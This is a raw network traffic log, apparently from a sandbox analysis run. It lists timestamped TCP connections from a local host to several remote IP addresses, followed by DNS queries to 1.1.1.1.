                          Oct 23, 2024 22:58:08.962165117 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:08.962192059 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:08.962683916 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:08.963083029 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:08.963166952 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:09.002866983 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:09.018894911 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:09.624871969 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:09.843224049 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:09.843278885 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:09.843388081 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:09.843647003 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:09.843662977 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:09.980474949 CEST44349704192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:09.980674028 CEST44349704192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:09.980746031 CEST49704443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:09.981437922 CEST49704443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:09.981455088 CEST44349704192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:09.998859882 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:10.007431984 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.007487059 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.007587910 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.007772923 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.007795095 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.039325953 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.328877926 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.328907013 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.328916073 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.328998089 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:10.329024076 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.330554008 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:10.330609083 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.330813885 CEST44349703192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:10.330878973 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:10.330899954 CEST49703443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:10.744024038 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:10.746087074 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:10.746119022 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:10.747706890 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:10.747802973 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:10.749015093 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:10.749103069 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:10.799966097 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:10.799997091 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:10.831336975 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:10.846884966 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:10.873454094 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.874198914 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.874247074 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.875956059 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.876044035 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.877216101 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.877311945 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.877494097 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:10.877510071 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:10.925899982 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.123429060 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.165936947 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.242290020 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242331028 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242348909 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242393970 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242413044 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242444038 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.242497921 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242543936 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.242563963 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.242645979 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.363492966 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.363508940 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.363564968 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.363739967 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.363739967 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.363806009 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.363976955 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.481688976 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.481719017 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.481770039 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.481853008 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.481930971 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.481930971 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.481930971 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.482130051 CEST49706443192.168.2.1618.245.31.33
                          Oct 23, 2024 22:58:11.482163906 CEST4434970618.245.31.33192.168.2.16
                          Oct 23, 2024 22:58:11.498675108 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:11.498732090 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:11.498856068 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:11.499139071 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:11.499156952 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:11.503187895 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:11.503212929 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:11.503334045 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:11.503595114 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:11.503608942 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:11.744430065 CEST4968980192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:12.382083893 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.383105993 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.383145094 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.384728909 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.384852886 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.385139942 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.385255098 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.385278940 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.386997938 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.387187004 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.387202024 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.388860941 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.388968945 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.389204025 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.389264107 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.389301062 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.427360058 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.427896023 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.427913904 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.431340933 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.443958044 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.443984032 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.474925995 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.490904093 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.565149069 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.565184116 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.565191984 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.565267086 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.565319061 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.565399885 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.566092968 CEST49710443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.566114902 CEST44349710192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.756227016 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.756261110 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.756269932 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.756405115 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.756464958 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.756488085 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.756731987 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.756731987 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.756731987 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.756731987 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.756757021 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.757045984 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.871978045 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.872015953 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.872119904 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.872323036 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:12.872339964 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:12.873564959 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.873593092 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.873666048 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.873678923 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.873734951 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.990974903 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.991004944 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.991127968 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.991143942 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.991204977 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.991338015 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.991391897 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.991398096 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.991436958 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:12.991487980 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.991595984 CEST49711443192.168.2.1618.245.31.5
                          Oct 23, 2024 22:58:12.991605043 CEST4434971118.245.31.5192.168.2.16
                          Oct 23, 2024 22:58:13.239989996 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:13.536922932 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.537448883 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.537482023 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.538640022 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.538814068 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.539271116 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.539346933 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.539402008 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.595534086 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.595547915 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.639448881 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.714171886 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.714202881 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.714211941 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.714421034 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.714452982 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.714515924 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.714734077 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.714835882 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:13.714906931 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.715451002 CEST49714443192.168.2.16192.254.233.44
                          Oct 23, 2024 22:58:13.715476036 CEST44349714192.254.233.44192.168.2.16
                          Oct 23, 2024 22:58:14.980051041 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:14.980110884 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:14.980240107 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:14.982000113 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:14.982017040 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:15.830744982 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:15.830977917 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:15.841654062 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:15.841692924 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:15.842061043 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:15.884917021 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:15.927361965 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.128658056 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.128730059 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.128812075 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:16.128886938 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:16.128926992 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.128954887 CEST49715443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:16.128969908 CEST44349715184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.162344933 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:16.162401915 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.162585974 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:16.162739992 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:16.162765980 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:16.889236927 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:17.014735937 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.014933109 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:17.015918970 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:17.015933037 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.016144991 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.018357992 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:17.063333035 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.190943003 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:17.400224924 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.400288105 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.400341034 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:17.401062012 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:17.401084900 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.401099920 CEST49716443192.168.2.16184.28.90.27
                          Oct 23, 2024 22:58:17.401108980 CEST44349716184.28.90.27192.168.2.16
                          Oct 23, 2024 22:58:17.574373007 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:17.574433088 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:17.574526072 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:17.575593948 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:17.575623989 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:17.795032024 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:18.051155090 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:18.418801069 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.418922901 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.421379089 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.421394110 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.421664953 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.464900017 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.476772070 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.523336887 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755542994 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755568027 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755577087 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755588055 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755615950 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755641937 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.755651951 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.755681038 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.755702019 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.756336927 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.756411076 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.756417990 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.756834030 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.756886959 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.765605927 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.765621901 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:18.765635014 CEST49717443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:18.765640974 CEST4434971720.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:19.006899118 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:20.725919008 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:20.726078987 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:20.726218939 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:21.257983923 CEST49705443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:58:21.258018017 CEST44349705142.250.186.68192.168.2.16
                          Oct 23, 2024 22:58:21.351139069 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:21.415026903 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:21.653939009 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:22.261946917 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:23.476175070 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:25.888089895 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:26.220982075 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:27.658082008 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:30.693093061 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:35.821192980 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:40.293059111 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:51.633137941 CEST49700443192.168.2.1676.76.21.123
                          Oct 23, 2024 22:58:51.633197069 CEST4434970076.76.21.123192.168.2.16
                          Oct 23, 2024 22:58:55.339824915 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:55.339860916 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:55.339971066 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:55.340425014 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:55.340436935 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.192559004 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.192684889 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.194506884 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.194535971 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.194977045 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.196525097 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.239339113 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476722002 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476782084 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476824999 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476953030 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.477006912 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.477145910 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.591942072 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592011929 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592057943 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592082024 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592101097 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592118979 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592156887 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592318058 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592331886 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592360973 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592366934 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:59:07.262109041 CEST49700443192.168.2.1676.76.21.123
                          Oct 23, 2024 22:59:07.262326002 CEST4434970076.76.21.123192.168.2.16
                          Oct 23, 2024 22:59:07.262422085 CEST49700443192.168.2.1676.76.21.123
                          Oct 23, 2024 22:59:09.896672964 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:09.896759033 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:09.896979094 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:09.897319078 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:09.897365093 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.958220005 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.958657026 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:10.958715916 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.959213972 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.959640026 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:10.959743023 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:11.014256954 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:20.965156078 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:20.965286016 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:20.965572119 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:21.258522034 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:21.258593082 CEST44349720142.250.186.68192.168.2.16
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 23, 2024 22:58:04.982098103 CEST53505671.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:05.007755041 CEST53597291.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:05.912796974 CEST5976953192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:05.913094044 CEST6340253192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:05.930438042 CEST53634021.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:05.931155920 CEST53597691.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:06.304045916 CEST53500741.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:06.797046900 CEST5836053192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:06.797365904 CEST5161653192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:07.076814890 CEST53516161.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:07.077424049 CEST53583601.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:09.834049940 CEST6432053192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:09.834203005 CEST4921453192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:09.841551065 CEST53492141.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:09.841928005 CEST53643201.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:09.997935057 CEST5201953192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:09.998111010 CEST5401053192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:10.006463051 CEST53520191.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:10.007034063 CEST53540101.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:11.490041018 CEST5377453192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:11.490454912 CEST5859353192.168.2.161.1.1.1
                          Oct 23, 2024 22:58:11.499572992 CEST53585931.1.1.1192.168.2.16
                          Oct 23, 2024 22:58:11.502469063 CEST53537741.1.1.1192.168.2.16
